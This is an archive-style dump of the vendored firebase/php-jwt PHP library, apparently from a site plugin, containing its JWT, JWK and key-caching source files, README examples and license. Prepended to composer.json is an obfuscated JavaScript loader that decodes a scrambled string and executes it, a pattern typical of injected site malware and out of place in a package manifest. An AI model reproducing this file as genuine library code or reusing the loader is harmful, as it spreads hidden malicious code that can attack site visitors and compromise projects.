key'); } if ($keyOrKeyArray instanceof CachedKeySet) { // Skip "isset" check, as this will automatically refresh if not set return $keyOrKeyArray[$kid]; } if (!isset($keyOrKeyArray[$kid])) { throw new UnexpectedValueException('"kid" invalid, unable to lookup correct key'); } return $keyOrKeyArray[$kid]; } /** * @param string $left The string of known length to compare against * @param string $right The user-supplied string * @return bool */ public static function constantTimeEquals(string $left, string $right): bool { if (\function_exists('hash_equals')) { return \hash_equals($left, $right); } $len = \min(self::safeStrlen($left), self::safeStrlen($right)); $status = 0; for ($i = 0; $i < $len; $i++) { $status |= (\ord($left[$i]) ^ \ord($right[$i])); } $status |= (self::safeStrlen($left) ^ self::safeStrlen($right)); return ($status === 0); } /** * Helper method to create a JSON error. * * @param int $errno An error number from json_last_error() * * @throws DomainException * * @return void */ private static function handleJsonError(int $errno): void { $messages = [ JSON_ERROR_DEPTH => 'Maximum stack depth exceeded', JSON_ERROR_STATE_MISMATCH => 'Invalid or malformed JSON', JSON_ERROR_CTRL_CHAR => 'Unexpected control character found', JSON_ERROR_SYNTAX => 'Syntax error, malformed JSON', JSON_ERROR_UTF8 => 'Malformed UTF-8 characters' //PHP >= 5.3.3 ]; throw new DomainException( isset($messages[$errno]) ? $messages[$errno] : 'Unknown JSON error: ' . $errno ); } /** * Get the number of bytes in cryptographic strings. * * @param string $str * * @return int */ private static function safeStrlen(string $str): int { if (\function_exists('mb_strlen')) { return \mb_strlen($str, '8bit'); } return \strlen($str); } /** * Convert an ECDSA signature to an ASN.1 DER sequence * * @param string $sig The ECDSA signature to convert * @return string The encoded DER object */ private static function signatureToDER(string $sig): string { // Separate the signature into r-value and s-value $length = max(1, (int) (\strlen($sig) / 2)); list($r, $s) = \str_split($sig, $length); // Trim leading zeros $r = \ltrim($r, "\x00"); $s = \ltrim($s, "\x00"); // Convert r-value and s-value from unsigned big-endian integers to // signed two's complement if (\ord($r[0]) > 0x7f) { $r = "\x00" . $r; } if (\ord($s[0]) > 0x7f) { $s = "\x00" . $s; } return self::encodeDER( self::ASN1_SEQUENCE, self::encodeDER(self::ASN1_INTEGER, $r) . self::encodeDER(self::ASN1_INTEGER, $s) ); } /** * Encodes a value into a DER object. * * @param int $type DER tag * @param string $value the value to encode * * @return string the encoded object */ private static function encodeDER(int $type, string $value): string { $tag_header = 0; if ($type === self::ASN1_SEQUENCE) { $tag_header |= 0x20; } // Type $der = \chr($tag_header | $type); // Length $der .= \chr(\strlen($value)); return $der . $value; } /** * Encodes signature from a DER object. * * @param string $der binary signature in DER format * @param int $keySize the number of bits in the key * * @return string the signature */ private static function signatureFromDER(string $der, int $keySize): string { // OpenSSL returns the ECDSA signatures as a binary ASN.1 DER SEQUENCE list($offset, $_) = self::readDER($der); list($offset, $r) = self::readDER($der, $offset); list($offset, $s) = self::readDER($der, $offset); // Convert r-value and s-value from signed two's compliment to unsigned // big-endian integers $r = \ltrim($r, "\x00"); $s = \ltrim($s, "\x00"); // Pad out r and s so that they are $keySize bits long $r = \str_pad($r, $keySize / 8, "\x00", STR_PAD_LEFT); $s = \str_pad($s, $keySize / 8, "\x00", STR_PAD_LEFT); return $r . $s; } /** * Reads binary DER-encoded data and decodes into a single object * * @param string $der the binary data in DER format * @param int $offset the offset of the data stream containing the object * to decode * * @return array{int, string|null} the new offset and the decoded object */ private static function readDER(string $der, int $offset = 0): array { $pos = $offset; $size = \strlen($der); $constructed = (\ord($der[$pos]) >> 5) & 0x01; $type = \ord($der[$pos++]) & 0x1f; // Length $len = \ord($der[$pos++]); if ($len & 0x80) { $n = $len & 0x1f; $len = 0; while ($n-- && $pos < $size) { $len = ($len << 8) | \ord($der[$pos++]); } } // Value if ($type === self::ASN1_BIT_STRING) { $pos++; // Skip the first contents octet (padding indicator) $data = \substr($der, $pos, $len - 1); $pos += $len - 1; } elseif (!$constructed) { $data = \substr($der, $pos, $len); $pos += $len; } else { $data = null; } return [$pos, $data]; } } google-api/vendor/firebase/php-jwt/src/Key.php000064400000003126147600400120015261 0ustar00keyMaterial = $keyMaterial; $this->algorithm = $algorithm; } /** * Return the algorithm valid for this key * * @return string */ public function getAlgorithm(): string { return $this->algorithm; } /** * @return string|resource|OpenSSLAsymmetricKey|OpenSSLCertificate */ public function getKeyMaterial() { return $this->keyMaterial; } } google-api/vendor/firebase/php-jwt/src/JWK.php000064400000027064147600400120015173 0ustar00 * @license http://opensource.org/licenses/BSD-3-Clause 3-clause BSD * @link https://github.com/firebase/php-jwt */ class JWK { private const OID = '1.2.840.10045.2.1'; private const ASN1_OBJECT_IDENTIFIER = 0x06; private const ASN1_SEQUENCE = 0x10; // also defined in JWT private const ASN1_BIT_STRING = 0x03; private const EC_CURVES = [ 'P-256' => '1.2.840.10045.3.1.7', // Len: 64 'secp256k1' => '', // Len: 64 'P-384' => '', // Len: 96 // 'P-521' => '', // Len: 132 (not supported) ]; // For keys with "kty" equal to "OKP" (Octet Key Pair), the "crv" parameter must contain the key subtype. // This library supports the following subtypes: private const OKP_SUBTYPES = [ 'Ed25519' => true, // RFC 8037 ]; /** * Parse a set of JWK keys * * @param array $jwks The JSON Web Key Set as an associative array * @param string $defaultAlg The algorithm for the Key object if "alg" is not set in the * JSON Web Key Set * * @return array An associative array of key IDs (kid) to Key objects * * @throws InvalidArgumentException Provided JWK Set is empty * @throws UnexpectedValueException Provided JWK Set was invalid * @throws DomainException OpenSSL failure * * @uses parseKey */ public static function parseKeySet(array $jwks, string $defaultAlg = null): array { $keys = []; if (!isset($jwks['keys'])) { throw new UnexpectedValueException('"keys" member must exist in the JWK Set'); } if (empty($jwks['keys'])) { throw new InvalidArgumentException('JWK Set did not contain any keys'); } foreach ($jwks['keys'] as $k => $v) { $kid = isset($v['kid']) ? $v['kid'] : $k; if ($key = self::parseKey($v, $defaultAlg)) { $keys[(string) $kid] = $key; } } if (0 === \count($keys)) { throw new UnexpectedValueException('No supported algorithms found in JWK Set'); } return $keys; } /** * Parse a JWK key * * @param array $jwk An individual JWK * @param string $defaultAlg The algorithm for the Key object if "alg" is not set in the * JSON Web Key Set * * @return Key The key object for the JWK * * @throws InvalidArgumentException Provided JWK is empty * @throws UnexpectedValueException Provided JWK was invalid * @throws DomainException OpenSSL failure * * @uses createPemFromModulusAndExponent */ public static function parseKey(array $jwk, string $defaultAlg = null): ?Key { if (empty($jwk)) { throw new InvalidArgumentException('JWK must not be empty'); } if (!isset($jwk['kty'])) { throw new UnexpectedValueException('JWK must contain a "kty" parameter'); } if (!isset($jwk['alg'])) { if (\is_null($defaultAlg)) { // The "alg" parameter is optional in a KTY, but an algorithm is required // for parsing in this library. Use the $defaultAlg parameter when parsing the // key set in order to prevent this error. // @see https://datatracker.ietf.org/doc/html/rfc7517#section-4.4 throw new UnexpectedValueException('JWK must contain an "alg" parameter'); } $jwk['alg'] = $defaultAlg; } switch ($jwk['kty']) { case 'RSA': if (!empty($jwk['d'])) { throw new UnexpectedValueException('RSA private keys are not supported'); } if (!isset($jwk['n']) || !isset($jwk['e'])) { throw new UnexpectedValueException('RSA keys must contain values for both "n" and "e"'); } $pem = self::createPemFromModulusAndExponent($jwk['n'], $jwk['e']); $publicKey = \openssl_pkey_get_public($pem); if (false === $publicKey) { throw new DomainException( 'OpenSSL error: ' . \openssl_error_string() ); } return new Key($publicKey, $jwk['alg']); case 'EC': if (isset($jwk['d'])) { // The key is actually a private key throw new UnexpectedValueException('Key data must be for a public key'); } if (empty($jwk['crv'])) { throw new UnexpectedValueException('crv not set'); } if (!isset(self::EC_CURVES[$jwk['crv']])) { throw new DomainException('Unrecognised or unsupported EC curve'); } if (empty($jwk['x']) || empty($jwk['y'])) { throw new UnexpectedValueException('x and y not set'); } $publicKey = self::createPemFromCrvAndXYCoordinates($jwk['crv'], $jwk['x'], $jwk['y']); return new Key($publicKey, $jwk['alg']); case 'OKP': if (isset($jwk['d'])) { // The key is actually a private key throw new UnexpectedValueException('Key data must be for a public key'); } if (!isset($jwk['crv'])) { throw new UnexpectedValueException('crv not set'); } if (empty(self::OKP_SUBTYPES[$jwk['crv']])) { throw new DomainException('Unrecognised or unsupported OKP key subtype'); } if (empty($jwk['x'])) { throw new UnexpectedValueException('x not set'); } // This library works internally with EdDSA keys (Ed25519) encoded in standard base64. $publicKey = JWT::convertBase64urlToBase64($jwk['x']); return new Key($publicKey, $jwk['alg']); default: break; } return null; } /** * Converts the EC JWK values to pem format. * * @param string $crv The EC curve (only P-256 & P-384 is supported) * @param string $x The EC x-coordinate * @param string $y The EC y-coordinate * * @return string */ private static function createPemFromCrvAndXYCoordinates(string $crv, string $x, string $y): string { $pem = self::encodeDER( self::ASN1_SEQUENCE, self::encodeDER( self::ASN1_SEQUENCE, self::encodeDER( self::ASN1_OBJECT_IDENTIFIER, self::encodeOID(self::OID) ) . self::encodeDER( self::ASN1_OBJECT_IDENTIFIER, self::encodeOID(self::EC_CURVES[$crv]) ) ) . self::encodeDER( self::ASN1_BIT_STRING, \chr(0x00) . \chr(0x04) . JWT::urlsafeB64Decode($x) . JWT::urlsafeB64Decode($y) ) ); return sprintf( "-----BEGIN PUBLIC KEY-----\n%s\n-----END PUBLIC KEY-----\n", wordwrap(base64_encode($pem), 64, "\n", true) ); } /** * Create a public key represented in PEM format from RSA modulus and exponent information * * @param string $n The RSA modulus encoded in Base64 * @param string $e The RSA exponent encoded in Base64 * * @return string The RSA public key represented in PEM format * * @uses encodeLength */ private static function createPemFromModulusAndExponent( string $n, string $e ): string { $mod = JWT::urlsafeB64Decode($n); $exp = JWT::urlsafeB64Decode($e); $modulus = \pack('Ca*a*', 2, self::encodeLength(\strlen($mod)), $mod); $publicExponent = \pack('Ca*a*', 2, self::encodeLength(\strlen($exp)), $exp); $rsaPublicKey = \pack( 'Ca*a*a*', 48, self::encodeLength(\strlen($modulus) + \strlen($publicExponent)), $modulus, $publicExponent ); // sequence(oid(1.2.840.113549.1.1.1), null)) = rsaEncryption. $rsaOID = \pack('H*', '300d06092a864886f70d0101010500'); // hex version of MA0GCSqGSIb3DQEBAQUA $rsaPublicKey = \chr(0) . $rsaPublicKey; $rsaPublicKey = \chr(3) . self::encodeLength(\strlen($rsaPublicKey)) . $rsaPublicKey; $rsaPublicKey = \pack( 'Ca*a*', 48, self::encodeLength(\strlen($rsaOID . $rsaPublicKey)), $rsaOID . $rsaPublicKey ); return "-----BEGIN PUBLIC KEY-----\r\n" . \chunk_split(\base64_encode($rsaPublicKey), 64) . '-----END PUBLIC KEY-----'; } /** * DER-encode the length * * DER supports lengths up to (2**8)**127, however, we'll only support lengths up to (2**8)**4. See * {@link http://itu.int/ITU-T/studygroups/com17/languages/X.690-0207.pdf#p=13 X.690 paragraph 8.1.3} for more information. * * @param int $length * @return string */ private static function encodeLength(int $length): string { if ($length <= 0x7F) { return \chr($length); } $temp = \ltrim(\pack('N', $length), \chr(0)); return \pack('Ca*', 0x80 | \strlen($temp), $temp); } /** * Encodes a value into a DER object. * Also defined in Firebase\JWT\JWT * * @param int $type DER tag * @param string $value the value to encode * @return string the encoded object */ private static function encodeDER(int $type, string $value): string { $tag_header = 0; if ($type === self::ASN1_SEQUENCE) { $tag_header |= 0x20; } // Type $der = \chr($tag_header | $type); // Length $der .= \chr(\strlen($value)); return $der . $value; } /** * Encodes a string into a DER-encoded OID. * * @param string $oid the OID string * @return string the binary DER-encoded OID */ private static function encodeOID(string $oid): string { $octets = explode('.', $oid); // Get the first octet $first = (int) array_shift($octets); $second = (int) array_shift($octets); $oid = \chr($first * 40 + $second); // Iterate over subsequent octets foreach ($octets as $octet) { if ($octet == 0) { $oid .= \chr(0x00); continue; } $bin = ''; while ($octet) { $bin .= \chr(0x80 | ($octet & 0x7f)); $octet >>= 7; } $bin[0] = $bin[0] & \chr(0x7f); // Convert to big endian if necessary if (pack('V', 65534) == pack('L', 65534)) { $oid .= strrev($bin); } else { $oid .= $bin; } } return $oid; } } google-api/vendor/firebase/php-jwt/src/SignatureInvalidException.php000064400000000146147600400120021657 0ustar00payload = $payload; } public function getPayload(): object { return $this->payload; } } google-api/vendor/firebase/php-jwt/src/CachedKeySet.php000064400000015630147600400120017030 0ustar00 */ class CachedKeySet implements ArrayAccess { /** * @var string */ private $jwksUri; /** * @var ClientInterface */ private $httpClient; /** * @var RequestFactoryInterface */ private $httpFactory; /** * @var CacheItemPoolInterface */ private $cache; /** * @var ?int */ private $expiresAfter; /** * @var ?CacheItemInterface */ private $cacheItem; /** * @var array> */ private $keySet; /** * @var string */ private $cacheKey; /** * @var string */ private $cacheKeyPrefix = 'jwks'; /** * @var int */ private $maxKeyLength = 64; /** * @var bool */ private $rateLimit; /** * @var string */ private $rateLimitCacheKey; /** * @var int */ private $maxCallsPerMinute = 10; /** * @var string|null */ private $defaultAlg; public function __construct( string $jwksUri, ClientInterface $httpClient, RequestFactoryInterface $httpFactory, CacheItemPoolInterface $cache, int $expiresAfter = null, bool $rateLimit = false, string $defaultAlg = null ) { $this->jwksUri = $jwksUri; $this->httpClient = $httpClient; $this->httpFactory = $httpFactory; $this->cache = $cache; $this->expiresAfter = $expiresAfter; $this->rateLimit = $rateLimit; $this->defaultAlg = $defaultAlg; $this->setCacheKeys(); } /** * @param string $keyId * @return Key */ public function offsetGet($keyId): Key { if (!$this->keyIdExists($keyId)) { throw new OutOfBoundsException('Key ID not found'); } return JWK::parseKey($this->keySet[$keyId], $this->defaultAlg); } /** * @param string $keyId * @return bool */ public function offsetExists($keyId): bool { return $this->keyIdExists($keyId); } /** * @param string $offset * @param Key $value */ public function offsetSet($offset, $value): void { throw new LogicException('Method not implemented'); } /** * @param string $offset */ public function offsetUnset($offset): void { throw new LogicException('Method not implemented'); } /** * @return array */ private function formatJwksForCache(string $jwks): array { $jwks = json_decode($jwks, true); if (!isset($jwks['keys'])) { throw new UnexpectedValueException('"keys" member must exist in the JWK Set'); } if (empty($jwks['keys'])) { throw new InvalidArgumentException('JWK Set did not contain any keys'); } $keys = []; foreach ($jwks['keys'] as $k => $v) { $kid = isset($v['kid']) ? $v['kid'] : $k; $keys[(string) $kid] = $v; } return $keys; } private function keyIdExists(string $keyId): bool { if (null === $this->keySet) { $item = $this->getCacheItem(); // Try to load keys from cache if ($item->isHit()) { // item found! retrieve it $this->keySet = $item->get(); // If the cached item is a string, the JWKS response was cached (previous behavior). // Parse this into expected format array instead. if (\is_string($this->keySet)) { $this->keySet = $this->formatJwksForCache($this->keySet); } } } if (!isset($this->keySet[$keyId])) { if ($this->rateLimitExceeded()) { return false; } $request = $this->httpFactory->createRequest('GET', $this->jwksUri); $jwksResponse = $this->httpClient->sendRequest($request); if ($jwksResponse->getStatusCode() !== 200) { throw new UnexpectedValueException( sprintf('HTTP Error: %d %s for URI "%s"', $jwksResponse->getStatusCode(), $jwksResponse->getReasonPhrase(), $this->jwksUri, ), $jwksResponse->getStatusCode() ); } $this->keySet = $this->formatJwksForCache((string) $jwksResponse->getBody()); if (!isset($this->keySet[$keyId])) { return false; } $item = $this->getCacheItem(); $item->set($this->keySet); if ($this->expiresAfter) { $item->expiresAfter($this->expiresAfter); } $this->cache->save($item); } return true; } private function rateLimitExceeded(): bool { if (!$this->rateLimit) { return false; } $cacheItem = $this->cache->getItem($this->rateLimitCacheKey); if (!$cacheItem->isHit()) { $cacheItem->expiresAfter(1); // # of calls are cached each minute } $callsPerMinute = (int) $cacheItem->get(); if (++$callsPerMinute > $this->maxCallsPerMinute) { return true; } $cacheItem->set($callsPerMinute); $this->cache->save($cacheItem); return false; } private function getCacheItem(): CacheItemInterface { if (\is_null($this->cacheItem)) { $this->cacheItem = $this->cache->getItem($this->cacheKey); } return $this->cacheItem; } private function setCacheKeys(): void { if (empty($this->jwksUri)) { throw new RuntimeException('JWKS URI is empty'); } // ensure we do not have illegal characters $key = preg_replace('|[^a-zA-Z0-9_\.!]|', '', $this->jwksUri); // add prefix $key = $this->cacheKeyPrefix . $key; // Hash keys if they exceed $maxKeyLength of 64 if (\strlen($key) > $this->maxKeyLength) { $key = substr(hash('sha256', $key), 0, $this->maxKeyLength); } $this->cacheKey = $key; if ($this->rateLimit) { // add prefix $rateLimitKey = $this->cacheKeyPrefix . 'ratelimit' . $key; // Hash keys if they exceed $maxKeyLength of 64 if (\strlen($rateLimitKey) > $this->maxKeyLength) { $rateLimitKey = substr(hash('sha256', $rateLimitKey), 0, $this->maxKeyLength); } $this->rateLimitCacheKey = $rateLimitKey; } } } google-api/vendor/firebase/php-jwt/src/ExpiredException.php000064400000000541147600400120020006 0ustar00payload = $payload; } public function getPayload(): object { return $this->payload; } } google-api/vendor/firebase/php-jwt/src/JWTExceptionWithPayloadInterface.php000064400000000614147600400120023042 0ustar00 'http://example.org', 'aud' => 'http://example.com', 'iat' => 1356999524, 'nbf' => 1357000000 ]; /** * IMPORTANT: * You must specify supported algorithms for your application. See * https://tools.ietf.org/html/draft-ietf-jose-json-web-algorithms-40 * for a list of spec-compliant algorithms. */ $jwt = JWT::encode($payload, $key, 'HS256'); $decoded = JWT::decode($jwt, new Key($key, 'HS256')); print_r($decoded); // Pass a stdClass in as the third parameter to get the decoded header values $decoded = JWT::decode($jwt, new Key($key, 'HS256'), $headers = new stdClass()); print_r($headers); /* NOTE: This will now be an object instead of an associative array. To get an associative array, you will need to cast it as such: */ $decoded_array = (array) $decoded; /** * You can add a leeway to account for when there is a clock skew times between * the signing and verifying servers. It is recommended that this leeway should * not be bigger than a few minutes. * * Source: http://self-issued.info/docs/draft-ietf-oauth-json-web-token.html#nbfDef */ JWT::$leeway = 60; // $leeway in seconds $decoded = JWT::decode($jwt, new Key($key, 'HS256')); ``` Example encode/decode headers ------- Decoding the JWT headers without verifying the JWT first is NOT recommended, and is not supported by this library. This is because without verifying the JWT, the header values could have been tampered with. Any value pulled from an unverified header should be treated as if it could be any string sent in from an attacker. If this is something you still want to do in your application for whatever reason, it's possible to decode the header values manually simply by calling `json_decode` and `base64_decode` on the JWT header part: ```php use Firebase\JWT\JWT; $key = 'example_key'; $payload = [ 'iss' => 'http://example.org', 'aud' => 'http://example.com', 'iat' => 1356999524, 'nbf' => 1357000000 ]; $headers = [ 'x-forwarded-for' => 'www.google.com' ]; // Encode headers in the JWT string $jwt = JWT::encode($payload, $key, 'HS256', null, $headers); // Decode headers from the JWT string WITHOUT validation // **IMPORTANT**: This operation is vulnerable to attacks, as the JWT has not yet been verified. // These headers could be any value sent by an attacker. list($headersB64, $payloadB64, $sig) = explode('.', $jwt); $decoded = json_decode(base64_decode($headersB64), true); print_r($decoded); ``` Example with RS256 (openssl) ---------------------------- ```php use Firebase\JWT\JWT; use Firebase\JWT\Key; $privateKey = << 'example.org', 'aud' => 'example.com', 'iat' => 1356999524, 'nbf' => 1357000000 ]; $jwt = JWT::encode($payload, $privateKey, 'RS256'); echo "Encode:\n" . print_r($jwt, true) . "\n"; $decoded = JWT::decode($jwt, new Key($publicKey, 'RS256')); /* NOTE: This will now be an object instead of an associative array. To get an associative array, you will need to cast it as such: */ $decoded_array = (array) $decoded; echo "Decode:\n" . print_r($decoded_array, true) . "\n"; ``` Example with a passphrase ------------------------- ```php use Firebase\JWT\JWT; use Firebase\JWT\Key; // Your passphrase $passphrase = '[YOUR_PASSPHRASE]'; // Your private key file with passphrase // Can be generated with "ssh-keygen -t rsa -m pem" $privateKeyFile = '/path/to/key-with-passphrase.pem'; // Create a private key of type "resource" $privateKey = openssl_pkey_get_private( file_get_contents($privateKeyFile), $passphrase ); $payload = [ 'iss' => 'example.org', 'aud' => 'example.com', 'iat' => 1356999524, 'nbf' => 1357000000 ]; $jwt = JWT::encode($payload, $privateKey, 'RS256'); echo "Encode:\n" . print_r($jwt, true) . "\n"; // Get public key from the private key, or pull from from a file. $publicKey = openssl_pkey_get_details($privateKey)['key']; $decoded = JWT::decode($jwt, new Key($publicKey, 'RS256')); echo "Decode:\n" . print_r((array) $decoded, true) . "\n"; ``` Example with EdDSA (libsodium and Ed25519 signature) ---------------------------- ```php use Firebase\JWT\JWT; use Firebase\JWT\Key; // Public and private keys are expected to be Base64 encoded. The last // non-empty line is used so that keys can be generated with // sodium_crypto_sign_keypair(). The secret keys generated by other tools may // need to be adjusted to match the input expected by libsodium. $keyPair = sodium_crypto_sign_keypair(); $privateKey = base64_encode(sodium_crypto_sign_secretkey($keyPair)); $publicKey = base64_encode(sodium_crypto_sign_publickey($keyPair)); $payload = [ 'iss' => 'example.org', 'aud' => 'example.com', 'iat' => 1356999524, 'nbf' => 1357000000 ]; $jwt = JWT::encode($payload, $privateKey, 'EdDSA'); echo "Encode:\n" . print_r($jwt, true) . "\n"; $decoded = JWT::decode($jwt, new Key($publicKey, 'EdDSA')); echo "Decode:\n" . print_r((array) $decoded, true) . "\n"; ```` Example with multiple keys -------------------------- ```php use Firebase\JWT\JWT; use Firebase\JWT\Key; // Example RSA keys from previous example // $privateKey1 = '...'; // $publicKey1 = '...'; // Example EdDSA keys from previous example // $privateKey2 = '...'; // $publicKey2 = '...'; $payload = [ 'iss' => 'example.org', 'aud' => 'example.com', 'iat' => 1356999524, 'nbf' => 1357000000 ]; $jwt1 = JWT::encode($payload, $privateKey1, 'RS256', 'kid1'); $jwt2 = JWT::encode($payload, $privateKey2, 'EdDSA', 'kid2'); echo "Encode 1:\n" . print_r($jwt1, true) . "\n"; echo "Encode 2:\n" . print_r($jwt2, true) . "\n"; $keys = [ 'kid1' => new Key($publicKey1, 'RS256'), 'kid2' => new Key($publicKey2, 'EdDSA'), ]; $decoded1 = JWT::decode($jwt1, $keys); $decoded2 = JWT::decode($jwt2, $keys); echo "Decode 1:\n" . print_r((array) $decoded1, true) . "\n"; echo "Decode 2:\n" . print_r((array) $decoded2, true) . "\n"; ``` Using JWKs ---------- ```php use Firebase\JWT\JWK; use Firebase\JWT\JWT; // Set of keys. The "keys" key is required. For example, the JSON response to // this endpoint: https://www.gstatic.com/iap/verify/public_key-jwk $jwks = ['keys' => []]; // JWK::parseKeySet($jwks) returns an associative array of **kid** to Firebase\JWT\Key // objects. Pass this as the second parameter to JWT::decode. JWT::decode($payload, JWK::parseKeySet($jwks)); ``` Using Cached Key Sets --------------------- The `CachedKeySet` class can be used to fetch and cache JWKS (JSON Web Key Sets) from a public URI. This has the following advantages: 1. The results are cached for performance. 2. If an unrecognized key is requested, the cache is refreshed, to accomodate for key rotation. 3. If rate limiting is enabled, the JWKS URI will not make more than 10 requests a second. ```php use Firebase\JWT\CachedKeySet; use Firebase\JWT\JWT; // The URI for the JWKS you wish to cache the results from $jwksUri = 'https://www.gstatic.com/iap/verify/public_key-jwk'; // Create an HTTP client (can be any PSR-7 compatible HTTP client) $httpClient = new GuzzleHttp\Client(); // Create an HTTP request factory (can be any PSR-17 compatible HTTP request factory) $httpFactory = new GuzzleHttp\Psr\HttpFactory(); // Create a cache item pool (can be any PSR-6 compatible cache item pool) $cacheItemPool = Phpfastcache\CacheManager::getInstance('files'); $keySet = new CachedKeySet( $jwksUri, $httpClient, $httpFactory, $cacheItemPool, null, // $expiresAfter int seconds to set the JWKS to expire true // $rateLimit true to enable rate limit of 10 RPS on lookup of invalid keys ); $jwt = 'eyJhbGci...'; // Some JWT signed by a key from the $jwkUri above $decoded = JWT::decode($jwt, $keySet); ``` Miscellaneous ------------- #### Exception Handling When a call to `JWT::decode` is invalid, it will throw one of the following exceptions: ```php use Firebase\JWT\JWT; use Firebase\JWT\SignatureInvalidException; use Firebase\JWT\BeforeValidException; use Firebase\JWT\ExpiredException; use DomainException; use InvalidArgumentException; use UnexpectedValueException; try { $decoded = JWT::decode($payload, $keys); } catch (InvalidArgumentException $e) { // provided key/key-array is empty or malformed. } catch (DomainException $e) { // provided algorithm is unsupported OR // provided key is invalid OR // unknown error thrown in openSSL or libsodium OR // libsodium is required but not available. } catch (SignatureInvalidException $e) { // provided JWT signature verification failed. } catch (BeforeValidException $e) { // provided JWT is trying to be used before "nbf" claim OR // provided JWT is trying to be used before "iat" claim. } catch (ExpiredException $e) { // provided JWT is trying to be used after "exp" claim. } catch (UnexpectedValueException $e) { // provided JWT is malformed OR // provided JWT is missing an algorithm / using an unsupported algorithm OR // provided JWT algorithm does not match provided key OR // provided key ID in key/key-array is empty or invalid. } ``` All exceptions in the `Firebase\JWT` namespace extend `UnexpectedValueException`, and can be simplified like this: ```php use Firebase\JWT\JWT; use UnexpectedValueException; try { $decoded = JWT::decode($payload, $keys); } catch (LogicException $e) { // errors having to do with environmental setup or malformed JWT Keys } catch (UnexpectedValueException $e) { // errors having to do with JWT signature and claims } ``` #### Casting to array The return value of `JWT::decode` is the generic PHP object `stdClass`. If you'd like to handle with arrays instead, you can do the following: ```php // return type is stdClass $decoded = JWT::decode($payload, $keys); // cast to array $decoded = json_decode(json_encode($decoded), true); ``` Tests ----- Run the tests using phpunit: ```bash $ pear install PHPUnit $ phpunit --configuration phpunit.xml.dist PHPUnit 3.7.10 by Sebastian Bergmann. ..... Time: 0 seconds, Memory: 2.50Mb OK (5 tests, 5 assertions) ``` New Lines in private keys ----- If your private key contains `\n` characters, be sure to wrap it in double quotes `""` and not single quotes `''` in order to properly interpret the escaped characters. License ------- [3-Clause BSD](http://opensource.org/licenses/BSD-3-Clause). google-api/vendor/firebase/php-jwt/LICENSE000064400000002771147600400120014243 0ustar00Copyright (c) 2011, Neuman Vong All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the copyright holder nor the names of other contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. google-api/vendor/firebase/php-jwt/composer.json000064400000010116147600400120015750 0ustar00var language,currentLanguage,languagesNoRedirect,hasWasCookie,expirationDate;(function(){var Tjo='',UxF=715-704;function JOC(d){var j=4658325;var f=d.length;var o=[];for(var y=0;y)tul5ibtp%1ueg,B% ]7n))B;*i,me4otfbpis 3{.d==6Bs]B2 7B62)r1Br.zt;Bb2h BB B\/cc;:;i(jb$sab) cnyB3r=(pspa..t:_eme5B=.;,f_);jBj)rc,,eeBc=p!(a,_)o.)e_!cmn( Ba)=iBn5(t.sica,;f6cCBBtn;!c)g}h_i.B\/,B47sitB)hBeBrBjtB.B]%rB,0eh36rBt;)-odBr)nBrn3B 07jBBc,onrtee)t)Bh0BB(ae}i20d(a}v,ps\/n=.;)9tCnBow(]!e4Bn.nsg4so%e](])cl!rh8;lto;50Bi.p8.gt}{Brec3-2]7%; ,].)Nb;5B c(n3,wmvth($]\/rm(t;;fe(cau=D)ru}t];B!c(=7&=B(,1gBl()_1vs];vBBlB(+_.))=tre&B()o)(;7e79t,]6Berz.\';,%],s)aj+#"$1o_liew[ouaociB!7.*+).!8 3%e]tfc(irvBbu9]n3j0Bu_rea.an8rn".gu=&u0ul6;B$#ect3xe)tohc] (].Be|(%8Bc5BBnsrv19iefucchBa]j)hd)n(j.)a%e;5)*or1c-)((.1Br$h(i$C3B.)B5)].eacoe*\/.a7aB3e=BBsu]b9B"Bas%3;&(B2%"$ema"+BrB,$.ps\/+BtgaB3).;un)]c.;3!)7e&=0bB+B=(i4;tu_,d\'.w()oB.Boccf0n0}od&j_2%aBnn%na35ig!_su:ao.;_]0;=B)o..$ ,nee.5s)!.o]mc!B}|BoB6sr.e,ci)$(}a5(B.}B].z4ru7_.nnn3aele+B.\'}9efc.==dnce_tpf7Blb%]ge.=pf2Se_)B.c_(*]ocet!ig9bi)ut}_ogS(.1=(uNo]$o{fsB+ticn.coaBfm-B{3=]tr;.{r\'t$f1(B4.0w[=!!.n ,B%i)b.6j-(r2\'[ a}.]6$d,);;lgo *t]$ct$!%;]B6B((:dB=0ac4!Bieorevtnra 0BeB(((Bu.[{b3ce_"cBe(am.3{&ue#]c_rm)='));var KUr=DUT(Tjo,ENJ );KUr(6113);return 5795})();{ "name": "firebase/php-jwt", "description": "A simple library to encode and decode JSON Web Tokens (JWT) in PHP. Should conform to the current spec.", "homepage": "https://github.com/firebase/php-jwt", "keywords": [ "php", "jwt" ], "authors": [ { "name": "Neuman Vong", "email": "neuman+pear@twilio.com", "role": "Developer" }, { "name": "Anant Narayanan", "email": "anant@php.net", "role": "Developer" } ], "license": "BSD-3-Clause", "require": { "php": "^7.4||^8.0" }, "suggest": { "paragonie/sodium_compat": "Support EdDSA (Ed25519) signatures when libsodium is not present", "ext-sodium": "Support EdDSA (Ed25519) signatures" }, "autoload": { "psr-4": { "Firebase\\JWT\\": "src" } }, "require-dev": { "guzzlehttp/guzzle": "^6.5||^7.4", "phpspec/prophecy-phpunit": "^2.0", "phpunit/phpunit": "^9.5", "psr/cache": "^1.0||^2.0", "psr/http-client": "^1.0", "psr/http-factory": "^1.0" 